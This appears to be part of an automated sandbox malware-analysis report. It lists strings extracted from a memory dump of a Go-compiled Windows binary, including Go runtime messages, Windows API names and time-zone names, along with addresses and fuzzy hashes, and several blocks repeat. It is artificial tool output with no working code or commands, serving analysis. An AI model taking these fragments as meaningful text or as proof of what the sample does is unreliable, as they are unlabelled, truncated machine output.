                                                                                • runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00AC0203
                                                                                • to unused region of span!#$%&'()-@^_`{}~+,.;=[]\/2006-01-02T15:04:05Z07:002910383045673370361328125ARM Thumb-2 little endianAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironmentStringsWFindNextVolumeMountPointWFindVolume, xrefs: 00AC0407
                                                                                • span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SH, xrefs: 00AC03A0
                                                                                • runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is malformedx509: invalid ECDSA parametersx509: malformed issu, xrefs: 00AC0287
                                                                                • >, xrefs: 00AC0275
                                                                                • found bad pointer in Go heap (incorrect use of unsafe or cgo?) : on an invalid notinheap pointerruntime: internal error: misuse of lockOSThread/unlockOSThreadunhandled exception when parsing data directory %s, reason: %vx509: certif, xrefs: 00AC026C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API String ID: 0-2372745613
                                                                                • Opcode ID: 3c01a3e208c6cd1283b3d1abba0f1f02d0e1d7740e11de7acdd2189b3a457022
                                                                                • Instruction ID: 0b78a9a991aebfd922fb9a594962ec46a6bc7f40b128e357466d6152b04e3fdb
                                                                                • Opcode Fuzzy Hash: 3c01a3e208c6cd1283b3d1abba0f1f02d0e1d7740e11de7acdd2189b3a457022
                                                                                • Instruction Fuzzy Hash: DA51A674909B80DFC300FF75E295B5EBBE4AF48748F81482DE8888B252D774D9449B63
                                                                                Strings
                                                                                • GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeIntel Itanium processor familyMapIter.Key called before NextOleCreatePropertyFrameIndirectPacific Standard Time (Mexico)QueryServiceDynamicI, xrefs: 00AB150F
                                                                                • !, xrefs: 00AB1316
                                                                                • ", missing CPU supportasn1: structure error: bytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyencoding: invalid UTF-8fatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interru, xrefs: 00AB13E0
                                                                                • GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWImage base beyond allowed addressInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWThunk AddressOfData beyond limitsbytes.Reader.Seek: invalid wh, xrefs: 00AB130D
                                                                                • " not supported for cpu option "ber2der: BER tag length too longbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunecannot represent time as UTCTime : input not full blocked25519: bad public key length: fail to seek to string table: %vfail, xrefs: 00AB12AE
                                                                                • GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetRecordInfoFromTypeInfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeLPSAFEARRA, xrefs: 00AB13B6
                                                                                • GODEBUG: value "GetAltMonthNamesGetComputerNameWGetCurrentThreadGetFullPathNameWGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassImperial_AramaicKEYVALS UNPAIREDLPSAFEARRAY_SizeManifestResourceMeroitic_CursiveNetApiBufferFreeOACreateTypeLib2OleL, xrefs: 00AB1284
                                                                                • "\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTL, xrefs: 00AB12D8, 00AB1337, 00AB1539
                                                                                • cpu., xrefs: 00AB1193
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !$"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTL$" not supported for cpu option "ber2der: BER tag length too longbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunecannot represent time as UTCTime : input not full blocked25519: bad public key length: fail to seek to string table: %vfail$", missing CPU supportasn1: structure error: bytes.Buffer: too largechan receive (nil chan)close of closed channeldevice or resource busyencoding: invalid UTF-8fatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interru$GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusGetRecordInfoFromTypeInfoGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorKaliningrad Standard TimeLPSAFEARRA$GODEBUG: no value specified for "GetVolumeNameForVolumeMountPointWImage base beyond allowed addressInitializeProcThreadAttributeListSetupDiGetDeviceRegistryPropertyWSetupDiSetDeviceRegistryPropertyWThunk AddressOfData beyond limitsbytes.Reader.Seek: invalid wh$GODEBUG: unknown cpu feature "GetProcessPreferredUILanguagesGetSecurityDescriptorRMControlGetSystemTimePreciseAsFileTimeIntel Itanium processor familyMapIter.Key called before NextOleCreatePropertyFrameIndirectPacific Standard Time (Mexico)QueryServiceDynamicI$GODEBUG: value "GetAltMonthNamesGetComputerNameWGetCurrentThreadGetFullPathNameWGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassImperial_AramaicKEYVALS UNPAIREDLPSAFEARRAY_SizeManifestResourceMeroitic_CursiveNetApiBufferFreeOACreateTypeLib2OleL$cpu.
                                                                                • API String ID: 0-511396939
                                                                                • Opcode ID: d51c0d84b94ffefb05173fbc8a2b11932a32f6555d402db4818b490d37e54572
                                                                                • Instruction ID: b53fe0c122e9ee1f0a9d0ce4e3daefe700d0fe7ed4ba6679d715e2353ac26338
                                                                                • Opcode Fuzzy Hash: d51c0d84b94ffefb05173fbc8a2b11932a32f6555d402db4818b490d37e54572
                                                                                • Instruction Fuzzy Hash: C1F1E370A087848FC714EF64D5A069EBBF5AF85304F94896DE8859B383D730ED45CB92
                                                                                Strings
                                                                                • B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons, xrefs: 00ACD8A6
                                                                                • B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0, xrefs: 00ACD7F2
                                                                                • B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062, xrefs: 00ACD7A2
                                                                                • )*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-, xrefs: 00ACD90F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACD74E, 00ACD778
                                                                                • [controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks, xrefs: 00ACD938
                                                                                • exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b, xrefs: 00ACD668
                                                                                • % CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM, xrefs: 00ACD63E
                                                                                • pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine, xrefs: 00ACD5FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons$ B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0$ B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062$ exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b$% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM$)*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$[controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage 
collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks$pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine
                                                                                • API String ID: 0-668479763
                                                                                • Opcode ID: 351f05377709de58face6c5f658600ca16c4895223685d35a3e0b00d4a87cd7c
                                                                                • Instruction ID: 7e3b69806c15ff4895286f0c38cd6ff1a408c7700cf1269761b5b1ff00e0ecb7
                                                                                • Opcode Fuzzy Hash: 351f05377709de58face6c5f658600ca16c4895223685d35a3e0b00d4a87cd7c
                                                                                • Instruction Fuzzy Hash: 84221674908B84CFC364EF29D590B5EBBE5BF89344F118A2EE8C897352DB709845CB42
                                                                                Strings
                                                                                • B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons, xrefs: 00ACD8A6
                                                                                • B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0, xrefs: 00ACD7F2
                                                                                • B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062, xrefs: 00ACD7A2
                                                                                • )*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-, xrefs: 00ACD90F
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00ACD74E, 00ACD778
                                                                                • [controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks, xrefs: 00ACD938
                                                                                • exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b, xrefs: 00ACD668
                                                                                • % CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM, xrefs: 00ACD63E
                                                                                • pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine, xrefs: 00ACD5FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons$ B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0$ B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062$ exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b$% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM$)*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$[controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage 
collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks$pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine
                                                                                • API String ID: 0-668479763
                                                                                • Opcode ID: 8afebcaafd8969bca223d1a7623d13eee74506550c1ec6eff30ced50f8cc79c0
                                                                                • Instruction ID: 0ffd64fba5f8dfd6f26805c9e2406daf278e4937b9278100adc3e707a0678f43
                                                                                • Opcode Fuzzy Hash: 8afebcaafd8969bca223d1a7623d13eee74506550c1ec6eff30ced50f8cc79c0
                                                                                • Instruction Fuzzy Hash: 51020574908B84CFC364EF29D580B5EBBE1BF89744F518A2DE8C897352DB709845CB42
                                                                                Strings
                                                                                • tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521ParamREPRORunicSHA-1STermSize=, xrefs: 00AFD36E
                                                                                • $, xrefs: 00AFD2F9
                                                                                • value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!, xrefs: 00AFD443
                                                                                • no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00AFD148
                                                                                • runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_Device_Interface_ListWCentra, xrefs: 00AFD114
                                                                                • pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1, xrefs: 00AFD31A
                                                                                • invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap :, xrefs: 00AFD522
                                                                                • targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvoke, xrefs: 00AFD344
                                                                                • runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaF, xrefs: 00AFD2F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-1516804383
                                                                                • Opcode ID: aa3439ca0f34fbf4acd72948918cb4d033b2aa76523c141b99d51bb3023b1606
                                                                                • Instruction ID: f3f5443625a51cb51b6d0acf81c722776f1b254d3314d5adca8d5ff9e64b05b1
                                                                                • Opcode Fuzzy Hash: aa3439ca0f34fbf4acd72948918cb4d033b2aa76523c141b99d51bb3023b1606
                                                                                • Instruction Fuzzy Hash: 74F1E0B4A097448FC314EF69D180A2EBBE1BF88714F948A2DF99987352D774E845CF42
                                                                                Strings
                                                                                • panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open, xrefs: 00AB7A3E
                                                                                • pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFull, xrefs: 00AB79C7
                                                                                • ., xrefs: 00AB78C3
                                                                                • panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov, xrefs: 00AB7A95
                                                                                • ./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04, xrefs: 00AB7943
                                                                                • panicwrap: unexpected string after package name: : slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader., xrefs: 00AB780D
                                                                                • value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-Byt, xrefs: 00AB791E
                                                                                • called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregister, xrefs: 00AB79A1
                                                                                • panicwrap: unexpected string after type name: pkcs7: content data is a decryptable data type : slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base poin, xrefs: 00AB78B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-3553926922
                                                                                • Opcode ID: 7b5501674a1e3de1f3ddb7b6adb2088d646b081fd1e55af3d10cb216225f9e6b
                                                                                • Instruction ID: 67453fadb98efe73f72edc84d1450b082f9f23db9fbef836e7287216237ad44e
                                                                                • Opcode Fuzzy Hash: 7b5501674a1e3de1f3ddb7b6adb2088d646b081fd1e55af3d10cb216225f9e6b
                                                                                • Instruction Fuzzy Hash: 48919FB49083459FC328DF69C19469EBBE5BB88304F108D2EE8D987392DB749948CF53
                                                                                Strings
                                                                                • runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00B06799, 00B068CC
                                                                                • - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNa, xrefs: 00B06921
                                                                                • types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st, xrefs: 00B06839
                                                                                • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00B067EE
                                                                                • runtime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65, xrefs: 00B06955
                                                                                • out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlS, xrefs: 00B068F7
                                                                                • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy, xrefs: 00B067C4
                                                                                • runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Na, xrefs: 00B068A9
                                                                                • !, xrefs: 00B0695E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • API String ID: 0-3174700562
                                                                                • Opcode ID: b53462eb8e74f0cef04caff72f936b44e86b80680e8621f4098d2be2ba476435
                                                                                • Instruction ID: c46f3da45574135d952c4830d2abd8397af6f4f1e9aaca9a825b581b55d7f6af
                                                                                • Opcode Fuzzy Hash: b53462eb8e74f0cef04caff72f936b44e86b80680e8621f4098d2be2ba476435
                                                                                • Instruction Fuzzy Hash: E581F2B4909B41CFC304EF65D59575EBBE4FF88308F80896DE88887352E774D9489B52
                                                                                Strings
